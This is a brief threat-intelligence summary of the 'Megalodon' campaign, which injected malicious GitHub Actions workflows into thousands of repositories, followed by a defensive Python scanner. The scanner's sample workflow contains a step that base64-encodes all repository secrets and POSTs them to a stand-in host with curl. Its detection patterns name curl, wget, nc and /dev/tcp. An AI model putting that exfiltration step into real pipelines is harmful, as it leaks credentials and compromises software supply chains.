Megalodon GitHub Attack Targets 5,561 Repos with Malicious CI/CD Workflows

Summary

A new automated campaign dubbed "Megalodon" has been discovered targeting over 5,500 GitHub repositories. The attacker used compromised accounts to inject malicious CI/CD workflows that executed bash payloads to exfiltrate sensitive information. The campaign was highly efficient, making thousands of malicious commits within a short timeframe.

IFF Assessment

FOE

The Megalodon campaign demonstrates a sophisticated and efficient method for compromising numerous code repositories, posing a significant threat to software supply chain security.

Defender Context

Defenders need to be aware of sophisticated campaigns like Megalodon that leverage CI/CD pipelines for malicious purposes. It's crucial to implement robust security measures for GitHub Actions, including strict access controls, code scanning for suspicious workflows, and monitoring for anomalous commit activity. Verifying the authenticity of author identities and build bot accounts is also a key defense strategy.
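As an added defender-side illustration (not code from the article or from the campaign), the following heuristic scans a GitHub Actions workflow for the pattern the summary describes: a shell step that both references repository secrets and runs an outbound transfer command. The workflow text and the collector URL are constructed for the example.

```python
import re

# Constructed sample (not from the campaign): a build workflow with one step that
# exposes all repository secrets to the shell, encodes them and posts them out.
SAMPLE_WORKFLOW = """\
name: ci
on: [push]
jobs:
  build:
    runs-on: ubuntu-latest
    steps:
      - uses: actions/checkout@v4
      - name: Run tests
        run: npm test
      - name: Collect
        env:
          ALL: ${{ toJSON(secrets) }}
        run: |
          echo "$ALL" | base64 -w0 | curl -s -X POST -d @- https://example.invalid/c
"""

SECRET_REF = re.compile(r"\$\{\{\s*(toJSON\(\s*secrets\s*\)|secrets\.\w+)\s*\}\}")
EXFIL_CMD = re.compile(r"\b(curl|wget|nc|ncat)\b|/dev/tcp/")
ENCODE_CMD = re.compile(r"\b(base64|xxd|openssl\s+enc)\b")

def split_steps(text):
    """Line-based split of a job's 'steps:' list into per-step text (no YAML parser)."""
    steps, current, in_steps = [], None, False
    for line in text.splitlines():
        if re.match(r"^\s*steps:\s*$", line):
            in_steps = True
        elif in_steps and re.match(r"^\s*-\s", line):  # start of the next list item
            if current is not None:
                steps.append("\n".join(current))
            current = [line]
        elif current is not None:
            current.append(line)
    if current is not None:
        steps.append("\n".join(current))
    return steps

def scan_workflow(text):
    """Flag steps that both reference secrets and run an outbound transfer tool.
    Returns one finding per such step; 'encoded' notes a base64/xxd/openssl stage."""
    findings = []
    for i, step in enumerate(split_steps(text)):
        if SECRET_REF.search(step) and EXFIL_CMD.search(step):
            name = re.search(r"name:\s*(.+)", step)
            findings.append({
                "step": name.group(1).strip() if name else f"step #{i}",
                "encoded": bool(ENCODE_CMD.search(step)),
            })
    return findings

if __name__ == "__main__":
    for f in scan_workflow(SAMPLE_WORKFLOW):
        print(f"suspicious step {f['step']!r} (encoded={f['encoded']})")
```

Run it over every `.github/workflows/*.yml` touched in a commit burst to triage which repositories need their workflow history and secrets reviewed first.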
